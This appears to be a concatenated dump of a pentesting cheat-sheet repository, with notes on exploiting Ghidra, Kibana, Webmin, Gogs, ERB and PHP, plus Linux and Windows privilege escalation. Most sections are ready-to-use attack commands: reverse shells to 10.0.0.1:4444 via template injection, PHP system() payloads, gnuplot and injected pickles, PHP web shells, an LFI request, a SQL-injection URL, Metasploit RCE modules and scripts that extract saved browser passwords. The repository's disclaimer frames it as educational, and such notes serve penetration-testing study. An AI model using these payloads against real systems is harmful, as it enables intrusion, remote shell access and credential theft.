4 | 5 | ## Create a Malicious Contract for Destructing a Contract 6 | 7 | ```js 8 | // SPDX-License-Identifier: MIT 9 | pragma solidity ^0.4.0; 10 | 11 | contract Attack { 12 | function attack(address _address) payable public { 13 | // the remaining Ether is sent to _address when destructing 14 | selfdestruct(_address); 15 | } 16 | } 17 | ``` 18 | -------------------------------------------------------------------------------- /docs/exploit/linux/ghidra-debug-mode-rce.md: -------------------------------------------------------------------------------- 1 | # Ghidra Debug Mode RCE 2 | 3 | ## Exploitation 4 | 5 | ```bash 6 | jdb -attach 127.0.0.1:18001 7 | > classpath 8 | > classes 9 | Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run() 10 | Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh") 11 | ``` 12 | 13 | ## References 14 | 15 | - [Ethical Hackers Club](https://www.youtube.com/watch?v=N3VcWIUpgfE) 16 | - [NationalSecurityAgency](https://github.com/NationalSecurityAgency/ghidra/issues/6) -------------------------------------------------------------------------------- /docs/exploit/web/elasticsearch/kibana.md: -------------------------------------------------------------------------------- 1 | # Kibana Pentesting 2 | 3 | Kibana is proprietary data visualization dashboard software for Elasticsearch. The default port is 5601. 
4 | 5 | ## Vulnerabilities 6 | 7 | ### Local File Inclusion (LFI) Version \< 6.4.3 & 5.6.13 8 | 9 | ```sh 10 | # quote the URL so the shell does not treat "&" as a background operator 11 | curl "http://:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt" 11 | ``` 12 | 13 | ### Remote Code Execution (RCE) Version \< 6.6.0 14 | 15 | Reference: [https://github.com/mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609) 16 | -------------------------------------------------------------------------------- /docs/exploit/web/browser/extract-web-browser-passwords.md: -------------------------------------------------------------------------------- 1 | # Extract Web Browser Passwords 2 | 3 | Browser passwords may be retrieved easily by decrypting the stored login data if the device is compromised. 4 | 5 | ## Firefox 6 | 7 | ```bash 8 | wget https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py 9 | python3 firefox_decrypt.py 10 | ``` 11 | 12 |
13 | 14 | ## Google Chrome 15 | 16 | ```bash 17 | wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py 18 | python3 decrypt_chrome_password.py 19 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/screen.md: -------------------------------------------------------------------------------- 1 | # Sudo Screen Privilege Escalation 2 | 3 | The `sudo screen` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```sh 8 | sudo -l 9 | 10 | (root) /usr/bin/screen -r testsession 11 | ``` 12 | 13 | If we can execute the **"screen"** command as root, we can spawn a root shell from the screen session. 14 | 15 | ## Exploitation 16 | 17 | First execute the **"screen"** command as root; a screen session will then start. 18 | Now we can spawn a root shell by pressing **"Ctrl+a"** followed by **"c"** in the screen session. -------------------------------------------------------------------------------- /docs/exploit/machine-learning/data-processing/data-visualization.md: -------------------------------------------------------------------------------- 1 | # Data Visualization for Machine Learning 2 | 3 | ## Simple Example 4 | 5 | ```py 6 | import pandas as pd 7 | import matplotlib.pyplot as plt 8 | 9 | df = pd.read_csv('example.csv', index_col=0) 10 | 11 | plt.figure(figsize=(5, 6)) 12 | 13 | # Choose a graph type 14 | plt.bar(df['Name'], df['Age'], color='red') 15 | # or 16 | plt.scatter(df['Name'], df['Age'], alpha=0.5) 17 | 18 | # Set title and labels 19 | plt.title("Example Title") 20 | plt.xlabel("Name") 21 | plt.ylabel("Age") 22 | 23 | # Display 24 | plt.show() 25 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/sql-injection.md: -------------------------------------------------------------------------------- 1 | # SQL Injection 2 | 3 | SQL injection (SQLi) is a code 
injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. 4 | 5 | ## Identify Where SQL Injection can be Performed 6 | 7 | There are many places where SQLi can be performed. For example, 8 | 9 | - URL parameters 10 | - POST parameters 11 | - HTTP request headers (Cookie, User-Agent, etc.) 12 | 13 | ## Cheat Sheet 14 | 15 | To see the SQL injection cheat sheet, please refer to [this page](sql-injection-cheat-sheet.md). 16 | -------------------------------------------------------------------------------- /docs/exploit/network/grpc.md: -------------------------------------------------------------------------------- 1 | # gRPC Pentesting 2 | 3 | gRPC is a cross-platform open source high performance remote procedure call framework. Default ports are 80 and 443, and the official docs example uses port 50051. 4 | 5 | ## Connect with [grpcui](https://github.com/fullstorydev/grpcui) 6 | 7 | **`grpcui`** is an interactive web UI for **gRPC**. 8 | If you don't have `grpcui`, you need to install it. 9 | 10 | ```bash 11 | go install github.com/fullstorydev/grpcui/cmd/grpcui@latest 12 | ``` 13 | 14 | Then we can interact with gRPC. 15 | 16 | ```bash 17 | grpcui -plaintext example.com:9019 18 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/http-header-injection.md: -------------------------------------------------------------------------------- 1 | # HTTP Header Injection 2 | 3 | If the target site inserts a user-provided value into the response header without sanitizing it, an attacker may inject arbitrary header key/value pairs. 4 | 5 | ## Exploit 6 | 7 | By inserting `\r\n` (URL encoded: `%0d%0a`), we may inject an arbitrary header value into the response. 
8 | 9 | ```bash 10 | # Inject "\r\nSet-Cookie: SESSID=123456" into the response header 11 | /?origin=example%0d%0aSet-Cookie:%20SESSID%3d123456 12 | ``` 13 | 14 | ## Exploit (XSS) 15 | 16 | ```bash 17 | /?origin=example%0d%0a 18 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/pgp.md: -------------------------------------------------------------------------------- 1 | # PGP (Pretty Good Privacy) 2 | 3 | PGP is an encryption program that provides cryptographic privacy and authentication for data communication. 4 | 5 | ## Decrypt 6 | 7 | First, you need to convert the private key into a hash format that John recognizes. 8 | 9 | ```sh 10 | gpg2john private.key > hash.txt 11 | ``` 12 | 13 | Crack the passphrase using John the Ripper. 14 | 15 | ```sh 16 | john --wordlist=wordlist.txt hash.txt 17 | ``` 18 | 19 | ## Decode Public Key 20 | 21 | There are some online tools. 22 | 23 | - **[PGPDump](https://8gwifi.org/pgpdump.jsp)** -------------------------------------------------------------------------------- /docs/exploit/web/erb-ssti.md: -------------------------------------------------------------------------------- 1 | # ERB SSTI 2 | 3 | ERB may be vulnerable to SSTI. 4 | 5 | ## Payloads 6 | 7 | Try the following payloads in the URL path, parameters, input fields, etc. 
8 | 9 | ```bash 10 | <%= 7*7 %> 11 | <%= user.username %> 12 | <%= system("whoami"); %> 13 | ``` 14 | 15 | ## Exploit 16 | 17 | If the above payloads affect the responses, we can inject arbitrary code as below: 18 | 19 | ```bash 20 | <%= system("ping -c 1 10.0.0.1"); %> 21 | 22 | # Reverse Shell 23 | <%= system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"); %> 24 | ``` 25 | 26 | ## References 27 | 28 | - [TrustedSec](https://trustedsec.com/blog/rubyerb-template-injection) -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/switch-user.md: -------------------------------------------------------------------------------- 1 | # Switch User on Windows 2 | 3 | ## Runas 4 | 5 | ```bash 6 | runas /user: cmd 7 | runas /user:\ cmd 8 | ``` 9 | 10 | ## RunasCS 11 | 12 | We can spawn another shell as another user with [RunasCS](https://github.com/antonioCoco/RunasCs). 13 | First, start a listener on the local machine. 14 | 15 | ```bash 16 | nc -lvnp 4444 17 | ``` 18 | 19 | Then execute the following command on the target machine. 20 | Replace `10.0.0.1:4444` with your local IP and port. 21 | 22 | ```powershell 23 | RunasCs.exe cmd -r 10.0.0.1:4444 24 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/kerberos-tgt-cracking.md: -------------------------------------------------------------------------------- 1 | # Kerberos TGT Cracking 2 | 3 | The Kerberos Ticket-Granting Ticket (TGT) is created during Kerberos authentication. Users can access the network using these tickets. They are often saved with the `.kirbi` extension, and we may be able to crack them. 4 | 5 | ## Crack TGT 6 | 7 | First convert the TGT to a hash which can be cracked by **John the Ripper**. 8 | 9 | ```sh 10 | kirbi2john tgt.kirbi > hash.txt 11 | # or 12 | python2 /usr/share/john/kirbi2john.py tgt.kirbi > hash.txt 13 | ``` 14 | 15 | Then crack it. 
16 | 17 | ```sh 18 | john --wordlist=wordlist.txt hash.txt 19 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/memcache.md: -------------------------------------------------------------------------------- 1 | # Memcache Pentesting 2 | 3 | Memcached is a general-purpose distributed memory caching system. The default port is 11211. 4 | 5 | ## Communication 6 | 7 | We can communicate with a memcache server using Netcat. 8 | 9 | ```bash 10 | nc -vn 11211 11 | Connection to 11211 port [tcp/*] succeeded! 12 | 13 | # Commands in nc 14 | version 15 | stats 16 | stats slabs 17 | stats items 18 | stats cachedump 0 19 | stats cachedump 1 0 20 | get 21 | ``` 22 | 23 | ## References 24 | 25 | - [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/11211-memcache) 26 | -------------------------------------------------------------------------------- /docs/exploit/web/php-rce-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | # PHP RCE Cheat Sheet 2 | 3 | ## Web Shell 4 | 5 | ```bash 6 | 7 | 8 | <%3fphp+system($_['cmd']);%3f> 9 | <%3fphp+echo+system($_['cmd']);%3f> 10 | ``` 11 | 12 | We can then access `/?cmd=whoami`. 13 | 14 | ## Reverse Shell 15 | 16 | ```bash 17 | & /dev/tcp/10.0.0.1/4444 0>&1');?> 18 | & /dev/tcp/10.0.0.1/4444 0>&1"');?> 19 | <%3fphp+system('bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261');%3f> 20 | <%3fphp+system('bash+-c+"bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261"');%3f> 21 | ``` -------------------------------------------------------------------------------- /docs/exploit/email/imap.md: -------------------------------------------------------------------------------- 1 | # IMAP (Internet Message Access Protocol) Pentesting 2 | 3 | IMAP is an internet standard protocol used by email clients. Default ports are 143 and 993. 
4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script imap-capabilities -p 143 9 | ``` 10 | 11 | ### Banner Grabbing 12 | 13 | ```sh 14 | nc -nv 143 15 | openssl s_client -connect :993 -quiet 16 | ``` 17 | 18 | ## Connect 19 | 20 | ```bash 21 | telnet 10.0.0.1 143 22 | ``` 23 | 24 | ## Commands 25 | 26 | ```bash 27 | # Login 28 | a1 login "" "" 29 | 30 | # Logout 31 | a1 logout 32 | 33 | # Close mailbox 34 | a1 close 35 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/tool/socks-proxy-in-burpsuite.md: -------------------------------------------------------------------------------- 1 | # SOCKS Proxy in Burp Suite 2 | 3 | If we want to use a SOCKS proxy in Burp Suite, we can add it in the proxy settings. 4 | 5 | ## Setup SOCKS Proxy 6 | 7 | 1. In **Burp Suite**, go to **Proxy → Proxy settings**. 8 | 2. In the settings window, select the **User** tab and go to **Network → Connections** in the left pane. 9 | 3. In the **SOCKS** proxy section, enable **"Override options for this project only"**. 10 | 4. Fill in the proxy host and port as follows: 11 | 12 | ```bash 13 | SOCKS proxy host: 127.0.0.1 14 | SOCKS proxy port: 9251 15 | ``` 16 | 17 | 5. Check **"Use SOCKS proxy"** and close the window. 
-------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | babel==2.17.0 2 | backrefs==5.9 3 | certifi==2025.7.14 4 | charset-normalizer==3.4.2 5 | click==8.2.1 6 | colorama==0.4.6 7 | ghp-import==2.1.0 8 | idna==3.10 9 | Jinja2==3.1.6 10 | Markdown==3.8.2 11 | MarkupSafe==3.0.2 12 | mergedeep==1.3.4 13 | mkdocs==1.6.1 14 | mkdocs-get-deps==0.2.0 15 | mkdocs-material==9.6.16 16 | mkdocs-material-extensions==1.3.1 17 | packaging==25.0 18 | paginate==0.5.7 19 | pathspec==0.12.1 20 | platformdirs==4.3.8 21 | Pygments==2.19.2 22 | pymdown-extensions==10.16 23 | python-dateutil==2.9.0.post0 24 | PyYAML==6.0.2 25 | pyyaml_env_tag==1.1 26 | requests==2.32.4 27 | six==1.17.0 28 | urllib3==2.5.0 29 | watchdog==6.0.0 30 | -------------------------------------------------------------------------------- /docs/exploit/network/wifi/wifi-password-recovery.md: -------------------------------------------------------------------------------- 1 | # WiFi Password Recovery 2 | 3 | If we forget a WiFi password, we may be able to recover it from the saved network profiles. 
4 | 5 | ## Windows 6 | 7 | Open Command Prompt as Administrator and then execute the following commands: 8 | 9 | ```sh 10 | # Show all network names you've accessed and saved 11 | netsh wlan show profile 12 | 13 | # Show the details of a specific network including its password 14 | netsh wlan show profile name="network-name" key=clear 15 | ``` 16 | 17 | ## Linux 18 | 19 | ```sh 20 | ls -al /etc/NetworkManager/system-connections/ 21 | cat /etc/NetworkManager/system-connections/example.nmconnection 22 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/telnet.md: -------------------------------------------------------------------------------- 1 | # Telnet Pentesting 2 | 3 | Telnet is an application protocol used on the internet or a local area network. The default port is 23. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script telnet-encryption -p 23 9 | nmap --script telnet-ntlm-info -p 23 10 | nmap --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=8s -p 23 11 | ``` 12 | 13 | ## Configuration Files 14 | 15 | ```bash 16 | cat /etc/inetd.conf 17 | # or 18 | cat /etc/xinetd.d/telnet 19 | ``` 20 | 21 | ## Connect 22 | 23 | ```sh 24 | telnet 25 | telnet 23 26 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/gnuplot.md: -------------------------------------------------------------------------------- 1 | # Gnuplot Privilege Escalation 2 | 3 | The `gnuplot` command is a command-line and GUI program that can generate two- and three-dimensional plots of functions, data, and data fits. 4 | 5 | ## Command Execution 6 | 7 | A **`gnuplot`** script file can be used to execute system commands as below. 8 | 9 | ```bash 10 | gnuplot test.plt 11 | ``` 12 | 13 | The contents of the **`.plt`** file look like the following. 
14 | 15 | ```bash 16 | system "whoami" 17 | 18 | # Reverse shell 19 | system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" 20 | ``` 21 | 22 | ## References 23 | 24 | - [Gnuplot Docs](http://gnuplot.info/docs_5.5/loc18483.html) -------------------------------------------------------------------------------- /docs/exploit/web/framework/blazor.md: -------------------------------------------------------------------------------- 1 | # Blazor Pentesting 2 | 3 | Blazor is a web framework for building interactive web applications using C# instead of JavaScript. 4 | 5 | ## Common Directories/Files 6 | 7 | ```bash 8 | # This file contains paths of DLLs that can be reversed. 9 | /_framework/blazor.boot.json 10 | /_framework/.dll 11 | ``` 12 | 13 | ## Reverse Engineering DLLs 14 | 15 | We can reverse DLLs such as `/_framework/.dll` using tools such as **DotPeek** to retrieve sensitive information (credentials, software versions, etc.). 16 | 17 | If you use DotPeek, right-click on the assembly name in Assembly Explorer and click **Decompiled Sources** for investigation. -------------------------------------------------------------------------------- /docs/exploit/web/wkhtmltopdf-ssrf.md: -------------------------------------------------------------------------------- 1 | # wkhtmltopdf SSRF 2 | 3 | wkhtmltopdf is a command line tool to render HTML into PDF using Qt WebKit. It is vulnerable to SSRF. 4 | 5 | ## Exploitation 6 | 7 | Create a PHP payload to read a local file. 8 | 9 | ```php 10 | 11 | ``` 12 | 13 | Then start a web server on the local machine. 14 | 15 | ```bash 16 | php -S 0.0.0.0:8000 17 | ``` 18 | 19 | Send a request to the endpoint where wkhtmltopdf is used. For example, 20 | 21 | ```bash 22 | /htmltopdf?item= 23 | ``` 24 | 25 | Now we can see the system user list in the generated PDF. 
-------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/doas.md: -------------------------------------------------------------------------------- 1 | # Doas Privilege Escalation 2 | 3 | `doas` executes arbitrary commands as another user. It's similar to the sudo command. doas.conf is interesting for privilege escalation. 4 | 5 | ## Investigation 6 | 7 | First of all, search for the location of doas.conf. 8 | 9 | ```sh 10 | find / -type f -name "doas.conf" 2>/dev/null 11 | ``` 12 | 13 | Next, check the configuration. 14 | 15 | ```sh 16 | doas -C /path/to/doas.conf 17 | doas -C /etc/doas.conf 18 | # or 19 | cat /etc/doas.conf 20 | ``` 21 | 22 | Execute doas as below. 23 | 24 | ```sh 25 | doas -u root 26 | ``` 27 | 28 | Please also refer to [GTFOBins](https://gtfobins.github.io/) for PrivEsc. 29 | -------------------------------------------------------------------------------- /docs/exploit/database/sqlite.md: -------------------------------------------------------------------------------- 1 | # SQLite Pentesting 2 | 3 | ## Interpreter 4 | 5 | ```sh 6 | sqlite3 sample.db 7 | sqlite3 sample.sqlite 8 | sqlitebrowser sample.db 9 | ``` 10 | 11 | ## Commands 12 | 13 | ```sh 14 | # Help 15 | sqlite> .help 16 | 17 | # Show databases 18 | sqlite> .databases 19 | 20 | # Show tables 21 | sqlite> .tables 22 | 23 | # Show table information 24 | sqlite> PRAGMA table_info(table_name); 25 | 26 | # Dump contents of tables 27 | sqlite> .dump 28 | 29 | # SQL commands to display values in the table 30 | sqlite> SELECT * FROM table_name; 31 | # Display values in Hex 32 | sqlite> SELECT HEX(column_name) FROM table_name; 33 | 34 | # Exit the interpreter 35 | sqlite> .quit 36 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/shell/reverse-shell-using-pwncat.md: -------------------------------------------------------------------------------- 1 | # Reverse Shell using Pwncat 2 | 3 | Pwncat is a reverse and bind shell handler. 4 | It can be downloaded from [here](https://pwncat.org/). 5 | To listen for a remote connection, run the following command. 6 | 7 | ```bash 8 | pwncat-cs -lp 4444 9 | 10 | # For Windows target 11 | pwncat-cs -m windows -lp 4444 12 | ``` 13 | 14 | ## Commands 15 | 16 | After the reverse connection is established, we can execute commands either locally or remotely. 17 | 18 | ```bash 19 | # Switch between Local and Remote shell 20 | Ctrl+D 21 | 22 | # Upload a file to target machine (e.g. upload example.txt from local to remote) 23 | (local) upload ./example.txt /tmp/example.txt 24 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/cms/subrion.md: -------------------------------------------------------------------------------- 1 | # Subrion CMS Pentesting 2 | 3 | Subrion is a content management system (CMS). 4 | 5 | ## File Upload to Reverse Shell (Credential Required) 6 | 7 | ### 1. Download Reverse Shell Payload 8 | 9 | Get the PHP payload from [php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) and change the file extension to **'.phar'**. 10 | Then start a listener. 11 | 12 | ```sh 13 | nc -lvnp 4444 14 | ``` 15 | 16 | ### 2. Upload the Payload in Subrion Panel 17 | 18 | 1. **Login** 19 | 20 | 2. **Move to Content -> Uploads in Panel** 21 | 22 | 3. **Upload reverse-shell.phar** 23 | 24 | 4. **Access /subrion/upload/reverse-shell.phar** 25 | 26 | Now you may get a shell. 
-------------------------------------------------------------------------------- /docs/exploit/web/elasticsearch/index.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch Pentesting 2 | 3 | Elasticsearch is a search engine based on the Lucene library. Default ports are 9200 and 9300. 4 | 5 | ## Default Credentials 6 | 7 | ```txt 8 | admin:elasticadmin 9 | elastic:changeme 10 | ``` 11 | 12 | ## Brute Force Credentials 13 | 14 | Brute-force the credentials sent in the "Authorization" header of the web page. 15 | 16 | ```sh 17 | hydra -L usernames.txt -P passwords.txt -s 9200 http-get / 18 | ``` 19 | 20 | ## Common Directories 21 | 22 | ```bash 23 | /_cat/ 24 | /_cat/indices 25 | /_cluster/ 26 | /_nodes/ 27 | /_remote/ 28 | /_security 29 | /_search?q=username 30 | /_search?q=password 31 | /_security/role 32 | /_security/user 33 | /_xpack/security/user/ 34 | ``` -------------------------------------------------------------------------------- /docs/disclaimer.md: -------------------------------------------------------------------------------- 1 | # Disclaimer 2 | 3 | Exploit Notes is only for educational purposes or penetration testing, not for attacking servers that you're not authorized to access. 4 | This site will not take any responsibility even if you attack a server illegally or cause damage unintentionally. 5 | Please use the contents at your own risk. 6 | 7 | The contents are not original but are based on information on the internet, which the author actually tried and confirmed to function. 8 | Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be up to date. 9 | 10 | I'm not a security expert, just an enthusiast, so the contents written here are not necessarily accurate. 
11 | -------------------------------------------------------------------------------- /docs/exploit/network/shell/fully-interactive-tty.md: -------------------------------------------------------------------------------- 1 | # Upgrade to Fully Interactive TTY 2 | 3 | After getting a reverse shell, the shell has poor functionality, so we can upgrade it to a more functional shell. 4 | 5 | ## Upgrade 6 | 7 | After connecting to the target with a reverse shell, it's recommended to make the shell more usable. 8 | 9 | ```sh 10 | python3 -c 'import pty; pty.spawn("/bin/bash")' 11 | # or 12 | python -c 'import pty; pty.spawn("/bin/bash")' 13 | # or 14 | python2 -c 'import pty; pty.spawn("/bin/bash")' 15 | # or 16 | SHELL=/bin/bash script -q /dev/null 17 | ``` 18 | 19 | The commands below make our shell even better. 20 | 21 | ```sh 22 | Ctrl+z 23 | stty raw -echo;fg 24 | Enter x2 25 | export TERM=xterm 26 | ``` -------------------------------------------------------------------------------- /docs/exploit/machine-learning/model/pickle-code-injection.md: -------------------------------------------------------------------------------- 1 | # Pickle Code Injection 2 | 3 | ## Exploit 4 | 5 | ```bash 6 | fickling --inject "import os; os.system('/bin/bash')" example.pkl 7 | 8 | # Reverse shell (replace "10.0.0.1" and 4444 with your own) 9 | fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl 10 | ``` 11 | 12 | ## References 13 | 14 | - [fickling](https://github.com/trailofbits/fickling) 15 | - [The Trail of Bits Blog](https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/) 16 | - [The Hacker News](https://thehackernews.com/2024/06/new-attack-technique-sleepy-pickle.html) 17 | -------------------------------------------------------------------------------- /docs/exploit/web/insecure-deserialization.md: 
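Added example for the Pickle Code Injection page above (and the deserialization topic that follows); this is not code from the Exploit Notes repository. It walks a pickle's opcode stream with `pickletools` without executing it, reports the globals the stream would import and the calls it would make (an injected `os.system(...)` needs both), and loads pickles only through an allowlist `Unpickler`. The sample pickles are constructed inline, not real model files.

```python
"""Added example (not from the Exploit Notes repository): inspect a pickle
before loading it, and load it only through an allowlist of globals."""
import io
import pickle
import pickletools
from collections import OrderedDict

# Opcodes that turn a dotted name into a Python object. An injected
# "import os; os.system(...)" payload has to use one of them to reach os.system.
GLOBAL_OPS = {"GLOBAL", "STACK_GLOBAL", "INST"}
# Opcodes that call an object already on the pickle stack.
CALL_OPS = {"REDUCE", "BUILD", "OBJ", "NEWOBJ", "NEWOBJ_EX"}
# Opcodes that push a string; STACK_GLOBAL reads module and name from these.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def scan_pickle(data: bytes) -> dict:
    """Walk the opcode stream without executing it.

    Returns {"globals": [dotted names], "calls": n}. For STACK_GLOBAL the
    module and name are the two most recently pushed strings; we track string
    pushes only, not the memo, which is exact for pickle.dumps output but an
    approximation for hand-crafted streams that reuse memoized strings.
    """
    report = {"globals": [], "calls": 0}
    recent_strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            recent_strings.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            # pickletools renders the argument as "module name"
            report["globals"].append(arg.replace(" ", "."))
        elif op.name == "STACK_GLOBAL":
            if len(recent_strings) >= 2:
                report["globals"].append(
                    f"{recent_strings[-2]}.{recent_strings[-1]}")
            else:
                report["globals"].append("<unresolved>")
        elif op.name in CALL_OPS:
            report["calls"] += 1
    return report


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that resolves only (module, name) pairs on the allowlist."""

    def __init__(self, data: bytes, allowed: frozenset):
        super().__init__(io.BytesIO(data))
        self.allowed = allowed

    def find_class(self, module, name):
        if (module, name) in self.allowed:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def try_safe_load(data: bytes, allowed=frozenset()):
    """Return (True, obj) on success or (False, reason) when a global is blocked."""
    try:
        return True, AllowlistUnpickler(data, allowed).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


# Constructed sample pickles (not real model files).
PLAIN = pickle.dumps({"weights": [0.1, 0.2], "epoch": 3}, protocol=4)
WITH_GLOBAL = pickle.dumps(OrderedDict(a=1), protocol=4)    # STACK_GLOBAL + REDUCE
LEGACY_GLOBAL = pickle.dumps(OrderedDict(a=1), protocol=3)  # GLOBAL + REDUCE
ALLOW_ORDEREDDICT = frozenset({("collections", "OrderedDict")})

if __name__ == "__main__":
    for label, blob in (("plain", PLAIN), ("with_global", WITH_GLOBAL)):
        print(label, scan_pickle(blob), try_safe_load(blob))
    print("allowlisted", try_safe_load(WITH_GLOBAL, ALLOW_ORDEREDDICT))
```

A plain data pickle reports no globals and loads; the OrderedDict pickle is refused until `collections.OrderedDict` is explicitly allowed, which is the same gate that stops an injected `os.system` reference.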
-------------------------------------------------------------------------------- 1 | # Insecure Deserialization 2 | 3 | Insecure Deserialization is the exploitation of vulnerabilities in the deserialization process of a computer system to execute unauthorized code, gain access to sensitive information, or perform other malicious actions. 4 | 5 | ## PHP Gadget Chains 6 | 7 | ### PHPGGC 8 | 9 | **[PHPGGC](https://github.com/ambionics/phpggc)** is a library of PHP unserialize() payloads along with a tool to generate them, from the command line or programmatically. 10 | 11 | ```sh 12 | phpggc -l 13 | ``` 14 | 15 | ## Ysoserial 16 | 17 | **[Ysoserial](https://github.com/frohoff/ysoserial)** is a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. -------------------------------------------------------------------------------- /docs/exploit/database/couchdb.md: -------------------------------------------------------------------------------- 1 | # CouchDB Pentesting 2 | 3 | Apache CouchDB is a document-oriented NoSQL database. Default ports are 5984 and 6984. 4 | 5 | ## Directories 6 | 7 | ```sh 8 | # List all databases 9 | /_all_dbs 10 | 11 | # Show information about a database 12 | / 13 | 14 | # Futon administration interface 15 | /_utils/ 16 | # Temporary View 17 | /_utils/database.html?/_temp_view 18 | ``` 19 | 20 | ## Basic Operations 21 | 22 | ```sh 23 | # Create a new database 24 | curl -X PUT https://example.com:5984/ 25 | 26 | # Delete a database 27 | curl -X DELETE https://example.com:5984/ 28 | ``` 29 | 30 | ## References 31 | 32 | - [CouchDB Guide](https://guide.couchdb.org/draft/tour.html) -------------------------------------------------------------------------------- /docs/exploit/web/webmin.md: -------------------------------------------------------------------------------- 1 | # Webmin Pentesting 2 | 3 | Webmin is a web-based system administration tool for Unix. The default port is 10000. 
4 | 5 | ## Default Credentials 6 | 7 | ```txt 8 | admin:admin 9 | ``` 10 | 11 | ## password_change.cgi Command Injection version=1.890 12 | 13 | ```sh 14 | msfconsole 15 | msf> use exploit/linux/http/webmin_backdoor 16 | msf> set rhosts 17 | msf> set lhost 18 | msf> run 19 | shell 20 | ``` 21 | 22 | ## Remote Code Execution (RCE) version\<2.37 23 | 24 | Webmin version\<2.37 is vulnerable to remote code execution. 25 | Download the payload. 26 | 27 | ```sh 28 | git clone https://github.com/MuirlandOracle/CVE-2019-15107 29 | cd CVE-2019-15107 30 | python3 CVE-2019-15107.py 31 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/umount.md: -------------------------------------------------------------------------------- 1 | # Sudo Umount Privilege Escalation 2 | 3 | The `sudo umount` command might be vulnerable to privilege escalation. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | (root) NOPASSWD: /bin/umount 11 | ``` 12 | 13 | If we can execute the umount command as root, we can escalate privileges. 14 | 15 | ## Exploitation 16 | 17 | On the target machine, check which directories are mounted. 18 | 19 | ```bash 20 | cat /etc/fstab 21 | showmount -e localhost 22 | ``` 23 | 24 | Assume the **`/opt/example`** folder is mounted. 25 | If we unmount this folder, the original files that existed before the directory was mounted may appear. 26 | 27 | ```bash 28 | sudo /bin/umount /opt/example 29 | ls -al /opt/example 30 | ``` -------------------------------------------------------------------------------- /docs/exploit/version-control/git/gogs.md: -------------------------------------------------------------------------------- 1 | # Gogs Pentesting 2 | 3 | Gogs (Go Git Service) is a painless self-hosted Git service. 
4 | 5 | ## SQL injection ([CVE-2014-8682](https://www.exploit-db.com/exploits/35238)) 6 | 7 | ```txt 8 | http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- 9 | ``` 10 | 11 | ### Automation 12 | 13 | ```bash 14 | sqlmap -u "https://example.com/api/v1/repos/search?q=test" 15 | sqlmap -u "https://example.com/api/v1/users/search?q=test" 16 | ``` 17 | 18 | ## Git Hooks Remote Code Execution (RCE) 19 | 20 | ```bash 21 | msfconsole 22 | msf> use exploit/multi/http/gogs_git_hooks_rce 23 | msf> (set options...) 24 | msf> run 25 | ``` -------------------------------------------------------------------------------- /docs/exploit/machine-learning/read-pt.md: -------------------------------------------------------------------------------- 1 | # Read PT File 2 | 3 | A PT file is a machine learning model file generated by PyTorch. 4 | 5 | ## Load Model from PT 6 | 7 | ```python 8 | import torch 9 | import torch.nn as nn 10 | 11 | class ExampleModel(nn.Module): 12 | def __init__(self): 13 | super().__init__() 14 | self.flatten = nn.Flatten() 15 | self.linear_relu_stack = nn.Sequential( 16 | nn.Linear(28*28, 512), 17 | nn.ReLU(), 18 | nn.Linear(512, 10)) 19 | 20 | def forward(self, x): 21 | x = self.flatten(x) 22 | logits = self.linear_relu_stack(x) 23 | return logits 24 | 25 | model = ExampleModel() 26 | # torch.load unpickles the file, so only load .pt files 